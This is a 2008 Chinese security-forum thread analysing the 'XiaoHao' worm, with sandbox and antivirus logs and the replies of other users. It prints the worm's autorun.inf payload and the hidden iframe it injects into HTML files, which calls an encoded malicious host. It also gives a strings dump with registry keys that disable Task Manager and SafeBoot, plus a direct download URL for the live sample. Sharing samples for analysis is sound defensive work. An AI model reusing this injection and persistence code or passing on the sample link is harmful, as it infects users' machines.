挖掘最新“小浩”病毒

显示全部楼层 · 发表于 2008-4-26 16:06:15

【1】

【2】2008-04-26 15:22:58 应用程序保护(修改系统时间)    操作:使用隔离区操作
进程路径:  D:\我的文档\桌面\XiaoHao.exe
更改后系统时间:  2005-4-26 7:22

【3】会生成许多htm文件，例如：

【4】C:\EQSandBox\D\SOFT\Spx截图工具\更高版本.html
   [DETECTION] Contains detection pattern of the HTML script virus HTML/Infected.WebPage.Gen
   [NOTE]    A backup was created as 'ba5b7416.qua'  ( QUARANTINE )
   [NOTE]    The file was deleted!
C:\EQSandBox\D\SOFT\Thunder\Components\Community\local\default.html
   [DETECTION] Contains detection pattern of the HTML script virus HTML/Infected.WebPage.Gen
   [NOTE]    A backup was created as '4878d9ab.qua'  ( QUARANTINE )
   [NOTE]    The file was deleted!
C:\EQSandBox\D\SOFT\Thunder\Components\P4PClient\p4p_local.htm
   [DETECTION] Contains detection pattern of the HTML script virus HTML/Infected.WebPage.Gen
   [NOTE]    A backup was created as '4882d972.qua'  ( QUARANTINE )
   [NOTE]    The file was deleted!
C:\EQSandBox\D\SOFT\Thunder\Program\getAllurl.htm
   [DETECTION] Contains detection pattern of the HTML script virus HTML/Infected.WebPage.Gen
   [NOTE]    A backup was created as '4886d9a3.qua'  ( QUARANTINE )
   [NOTE]    The file was deleted!
C:\EQSandBox\D\SOFT\Thunder\Program\geturl.htm
   [DETECTION] Contains detection pattern of the HTML script virus HTML/Infected.WebPage.Gen
   [NOTE]    A backup was created as '490d2fcc.qua'  ( QUARANTINE )
   [NOTE]    The file was deleted!

【5】在全部分区下建立xiaohao.com文件，并建立autorun.inf文件：
[Autorun] open=Xiaohao.com
shell\open=打开(&O)
shell\open\Command=Xiaohao.com
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=Xiaohao.com
shellexecute=Xiaohao.com
shell\Auto\command=Xiaohao.com

【6】小浩病毒会通过默认浏览器浏览这个页面http://www.158dm.cn/bd.htm

【7】随便打开一个htm文件就会发现
“<iframe src=http://%77%77%77%2E%31%35%38%64%6D%2E%63%6E/%61%31%2E%68%74%6D width=0 height=0></iframe>
<iframe src=http://%77%77%77%2E%31%35%38%64%6D%2E%63%6E/%61%31%2E%68%74%6D width=0 height=0></iframe>

【8】刚才那个小浩的改动时间的操作全部被沙盘拦截，所以SSM没报警，不过那个小浩病毒会根据电脑上的应用程序创建对应的htm文件，你安装的软件越多，生成的HTM文件就越多，每个HTM文件的结尾均会有诸如<iframe src=http://%77%77%77%2E%31%35%38%64%6D%2E%63%6E/%61%31%2E%68%74%6D width=0 height=0></iframe> <iframe src=http://%77%77%77%2E%31%35%38%64%6D%2E%63%6E/%61%31%2E%68%74%6D width=0 height=0></iframe>这样的语句，无语。

显示全部楼层 · 发表于 2008-4-26 16:19:16

EAV 无视
小浩的图标怎么成耗子了！

显示全部楼层 · 发表于 2008-4-26 16:20:49

这次的应该叫成小耗了

显示全部楼层 · 发表于 2008-4-26 16:20:50

TO KL

显示全部楼层 · 发表于 2008-4-26 16:24:17

McAfee found nothing

显示全部楼层 · 发表于 2008-4-26 16:24:45

0000077C 0040137C    0 Xiaohao.com
00000788 00401388    0 autorun.inf
00000794 00401394    0 shell\Auto\command=Xiaohao.com
000007B8 004013B8    0 shellexecute=Xiaohao.com
000007D4 004013D4    0 shell\explore\Command=Xiaohao.com
000007F8 004013F8    0 shell\explore=
00000818 00401418    0 shell\open\Default=1
00000830 00401430    0 shell\open\Command=Xiaohao.com
00000854 00401454    0 shell\open=
0000086C 0040146C    0 open=Xiaohao.com
00000880 00401480    0 [Autorun]
0000088C 0040148C    0 config.exe
00000898 00401498    0 Xiaohao.exe
000008A4 004014A4    0 XiaoHao.exe
000008B0 004014B0    0 xiaohao.exe
000008BC 004014BC    0 KV*.exe
000008C4 004014C4    0 Iparmor.exe
000008D0 004014D0    0 Navapw32.exe
000008E0 004014E0    0 Rav.exe
000008E8 004014E8    0 kavscr.exe
000008F4 004014F4    0 avp.exe
00000924 00401524    0 \exloroe.com
00000940 00401540    0 http://%77%77%77%2E%31%35%38%64%6D%2E%63%6E/%62%64%2E%68%74%6D
00000982 00401582    0 <iframe src=http://%77%77%77%2E%31%35%38%64%6D%2E%63%6E/%61%31%2E%68%74%6D width=0 height=0></iframe>
000009F8 004015F8    0 "%1" %*
00000A04 00401604    0 exefile\shell\open\command
00000A20 00401620    0 "%1" %*
00000A30 00401630    0 NoBrowserOptions
00000A44 00401644    0 Software\Policies\Microsoft\Internet Explorer\Restrictions
00000A80 00401680    0 exloroe
00000A88 00401688    0 Software\Microsoft\Windows\CurrentVersion\Run
00000ABC 004016BC    0 \word.com
00000AC8 004016C8    0 C:\Documents and Settings\All Users\
00000B04 00401704    0 CheckedValue
00000B14 00401714    0 SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
00000B68 00401768    0 DisableTaskMgr
00000B78 00401778    0 Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
00000BC4 004017C4    0 Software\Microsoft\Windows\CurrentVersion\Policies\System
00000C00 00401800    0 DisableRegistryTools
00000C18 00401818    0 regfile\shell\open\command
00000C3C 0040183C    0 SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden
00000C8C 0040188C    0 ShowSuperHidden
00000C9C 0040189C    0 Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
00000CD8 004018D8    0 radio
00000CE0 004018E0    0 Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL
00000D34 00401934    0 NoFolderOptions
00000D44 00401944    0 Software\Microsoft\Windows\Current Version\Policies\Explorer\NoFolderOptions
00000D94 00401994    0 SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
00000DEC 004019EC    0 SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
00000E48 00401A48    0 SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
00000EA0 00401AA0    0 SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
00000EFC 00401AFC    0 AutoEndTasks
00000F0C 00401B0C    0 Control Panel\Desktop
00000F24 00401B24    0 NoCommon Groups
00000F34 00401B34    0 Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommon Groups
00000F80 00401B80    0 DisableCMD
00000F8C 00401B8C    0 Software\Policies\Microsoft\Windows\System

显示全部楼层 · 发表于 2008-4-26 16:29:34

http://www.158dm.cn/XiaoHao.exe

显示全部楼层 · 发表于 2008-4-26 16:39:28

卡巴2009三下干掉

显示全部楼层 · 发表于 2008-4-26 17:10:53

小浩？

显示全部楼层 · 发表于 2008-4-26 17:19:06

【那个小老鼠在卡巴2009的画面中太匀称了】

[病毒样本] 挖掘最新“小浩”病毒

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

浏览过的版块